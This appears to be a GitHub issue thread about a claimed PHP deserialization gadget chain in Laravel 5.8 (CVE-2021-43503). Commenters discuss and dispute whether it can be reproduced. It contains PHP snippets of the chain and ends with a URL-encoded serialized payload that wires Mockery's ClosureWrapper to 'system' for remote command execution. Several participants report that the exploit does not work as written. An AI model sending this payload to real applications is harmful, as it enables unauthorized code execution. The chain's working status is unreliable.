Open guoyanan1g opened 2 years ago
Hi @guoyanan1g, does this only affect Laravel 5?
i haven't test the lower versions,maybe u can try to find if these functions are in the lower versions😂
Sorry, I was talking about the higher versions, we're currently using Laravel 8
i think it can't...
hi, @guoyanan1g ,I have some trouble when reproducing the vulnerability 1、Why is it showing this error ?
2、$c=new ClosureWrapper("dir"); why the payload doesn't have "dir" ?
Hi @PinkieChen, there is a similar CVE here: https://github.com/1nhann/vulns/issues/1
The comments hold a bit more information about replicating the issue, but seems to boil down to not unserialising unvalidated user input which is advised against by PHP already:
sorry,the exp is just an example showing the call callee relationship and the order ,u can view it as a reference ,pls not use it as payload directly .
Hi @guoyanan1g,
I think you gave the exp is wrong and cannot be reproduced in my local.
The problem is that the $this->manager->method
(Especially method) in Manager of __construct()
has no effect:
namespace Illuminate\Queue\Capsule{
class Manager{
protected $manager;
public function __construct($c)
{
$this->manager->method=$c; // This line
}
}
}
In Laravel 5.8, Manager's __call()
code is as follows:
public function __call($method, $parameters)
{
return $this->manager->$method(...$parameters);
}
In your exp example, the value of $method
is register
in POP chain, and there is no register()
function in ClosureWrapper
, nor in the exp example you gave. When you give $this->manager->method=$c
, I don't know what the intention is here.
I created a repo(https://github.com/kang8/CVE-2021-43503) to prove this. If you can create a directory(like hello/
) with RCE, please send a PR to prove it.
@guoyanan1g , @kang8 One doubt, is it necessary that the dependent package(in this case - mockery) should be available on the server in order to exploit this vulnerability?
Thanks in advance.
In fact, I can't even reproduce the vulnerability.
There is a php unserialize POP chain . The files and the functions are : ①laravel5.8\vendor\laravel\framework\src\Illuminate\Routing\PendingResourceRegistration.php ,destruct() ②laravel5.8\vendor\laravel\framework\src\Illuminate\Queue\Capsule\Manager.php,call(), ③laravel5.8\vendor\mockery\mockery\library\Mockery\ClosureWrapper.php,__invoke(). The exp is :
//O%3A46%3A%22Illuminate%5CRouting%5CPendingResourceRegistration%22%3A5%3A%7Bs%3A12%3A%22%00%2A%00registrar%22%3BO%3A32%3A%22Illuminate%5CQueue%5CCapsule%5CManager%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00manager%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22method%22%3BO%3A22%3A%22Mockery%5CClosureWrapper%22%3A1%3A%7Bs%3A31%3A%22%00Mockery%5CClosureWrapper%00closure%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A7%3A%22%00%2A%00name%22%3BN%3Bs%3A13%3A%22%00%2A%00controller%22%3BN%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A0%3A%7B%7Ds%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3B%7D